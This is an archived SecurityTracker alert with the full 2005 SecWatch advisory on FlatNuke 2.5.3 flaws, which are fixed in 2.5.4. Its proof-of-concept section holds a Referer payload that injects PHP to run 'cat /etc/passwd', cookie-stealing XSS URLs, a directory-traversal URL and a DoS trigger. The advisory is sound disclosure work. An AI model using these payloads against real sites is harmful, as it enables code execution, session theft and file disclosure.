SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   FlatNuke Vendors:   flatnuke.org
FlatNuke Referer Input Validation Hole Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1014114
SecurityTracker URL:  http://securitytracker.com/id/1014114
CVE Reference:   CVE-2005-1892, CVE-2005-1893, CVE-2005-1894, CVE-2005-1895, CVE-2005-1896   (Links to External Site)
Updated:  Jun 9 2005
Original Entry Date:  Jun 6 2005
Impact:   Denial of service via network, Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 2.5.3; possibly earlier versions
Description:   SecWatch reported several vulnerabilities in FlatNuke. A remote user can execute arbitrary commands on the target system. A remote user can determine the installation path and conduct cross-site scripting attacks.

A remote user can directly access the '/flatnuke/foot_news.php' script to cause the application to enter an infinite loop, consuming all available CPU resources.

A remote user can submit a request with a specially crafted HTTP Referer field that contains PHP code then invoke 'flatnuke/misc/flatstat/referer.php' to cause the PHP code to be executed on the target system. The code, including operating system commands, will run with the privileges of the target web service. Some demonstration exploit code is available at:

http://secwatch.org/exploits/2005/06/flatnuke_shell.php.info

The '/forum/help.php' and '/forum/footer.php' scripts do not properly validate user-supplied input in the 'border' and 'back' parameters. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the FlatNuke software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

Some demonstration exploit URLs are provided:

http://[target]/forum/help.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/help.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/footer.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/footer.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

A remote user can request the 'thumb.php' script with a specially crafted 'image' parameter value to view arbitrary images on the target system. A remote user can also determine the installation path via this script.

Some demonstration exploit URLs are provided:

http://[target]/flatnuke/thumb.php?image=../../non-webreadable/private/image.jpg
http://[target]/flatnuke/thumb.php?image=http://[attacker]/image.jpg
http://[target]/flatnuke/thumb.php?image=null
http://[target]/flatnuke/index.php?mod=none_Search&find=1&where=null
http://[target]/flatnuke/print.php
http://[target]/flatnuke/thumb.php?image=null

The vendor was notified on June 4, 2005.

The vulnerability was discovered by an anonymous person and disclosed by SecWatch.

Impact:   A remote user can execute arbitrary commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the FlatNuke software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can determine the installation path.

Solution:   The vendor has issued a fixed version (2.5.4), described at:

http://flatnuke.sourceforge.net/index.php?mod=read&id=1117979256

Vendor URL:  flatnuke.sourceforge.net/ (Links to External Site)
Cause:   Access control error, Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  FlatNuke Remote Denial of Service, Arbitrary PHP Code Execution,


======================================================================

                       SecWatch 06/06/2005

   FlatNuke Remote Denial of Service, Arbitrary PHP Code Execution,
      Cross-Site Scripting and Path Disclosure Vulnerabilities

======================================================================
Table of Contents

Product Introduction.................................................1
Affected ............................................................2
Severity.............................................................3
Description of Vulnerability.........................................4
Proof of Concept.....................................................5
Solution.............................................................6
Time Line............................................................7
Credits..............................................................8

======================================================================
1) Introduction

Homepage: http://flatnuke.sourceforge.net/
Overview: FlatNuke is a CMS (Content Management System), utilising flat
files for information storage.
Advisory: http://secwatch.org/advisories/secwatch/20050604_flatnuke.txt
SWID: 1010779

References:
http://flatnuke.sourceforge.net/index.php?mod=read&id=1117979256

======================================================================
2) Affected

FlatNuke version 2.5.3.

Prior versions may also be affected.

======================================================================
3) Severity

Rating: Moderately - Highly critical
Impact: Denial of Service
        System access
        Cross Site Scripting
        Exposure of system information
        Manipulation of data
Where:  From remote
Action: Public disclosure

======================================================================
4) Description of Vulnerabilities

Multiple vulnerabilities in FlatNuke have been reported, which can be
exploited by remote users to trigger denial of service conditions, execute
arbitrary PHP code, conduct Cross-Site Scripting attacks and disclose
arbitrary images and system information.

If the "/flatnuke/foot_news.php" script is accessed directly a while()
call is made that enters an infinite loop, leading to full CPU
utilisation.

HTTP referer information is stored in "/misc/flatstat/referer.php", a
remote user can submit a specially crafted HTTP request with a
non-URLencoded, spoofed referer such as "http://[attacker]/?cmd=<?php
system("cat /etc/passwd")?>", then can directly access
"http://[target]/flatnuke/misc/flatstat/referer.php" where the PHP code
will be executed. The PHP code, including operating system commands, will
run with the privileges of the target web service.

User-supplied input passed to the "border" and "back" parameters in the
"/forum/help.php" and "/forum/footer.php" scripts is not correctly
sanitised. This can be exploited to execute arbitrary script code in the
security context of an affected website, as a result the code will be able
to access any of the target user's cookies, access data recently submitted
by the target user via web form to the site, or take actions on the site
acting as the target user.

Note: Successful exploitation requires that "register_globals" is enabled.

User-supplied input passed to the "image" parameter in the "thumb.php"
script is not correctly validated. This can be exploited to disclose
arbitrary images from external and local resources via directory traversal
attacks, or to disclose the installation path.

It is also possible to disclose the system path by accessing certain
scripts directly or specially formed parameters.

======================================================================
5) Proof of Concept

Denial of Service:
http://[target]/flatnuke/foot_news.php

Arbitrary Command Execution PoC:
Demonstration exploit code has been released, available:
http://secwatch.org/exploits/2005/06/flatnuke_shell.php.info

Cross-Site Scripting:
http://[target]/forum/help.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/help.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/footer.php?back=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://[target]/forum/footer.php?border=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Information Disclosure:
http://[target]/flatnuke/index.php?mod=none_Search&find=1&where=null
http://[target]/flatnuke/print.php
http://[target]/flatnuke/thumb.php?image=null

Arbitrary Image Disclosure:
http://[target]/flatnuke/thumb.php?image=../../non-webreadable/private/image.jpg
http://[target]/flatnuke/thumb.php?image=http://[attacker]/image.jpg
http://[target]/flatnuke/thumb.php?image=null

======================================================================
6) Solution

The vulnerabilities have been resolved in FlatNuke version 2.5.4, available:
http://sourceforge.net/project/showfiles.php?group_id=93076&package_id=98622

Production systems should not display errors to clients.

======================================================================
7) Time Line

03/06/2005 - Infomation reported to SecWatch.
04/06/2005 - Information validated by SecWatch.
             Vendor notified
05/06/2005 - Vendor responded promptly, new version (2.5.4) released
resolving issues.
             Suggestion for safer referer logging method suggested.
06/06/2005 - Public disclosure.

======================================================================
8) Credits
Discovered by an anonymous person, reported via SecWatch.


NOTE: Please reply to this email if you would like to be removed from this
distribution list with a subject of 'remove'.
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC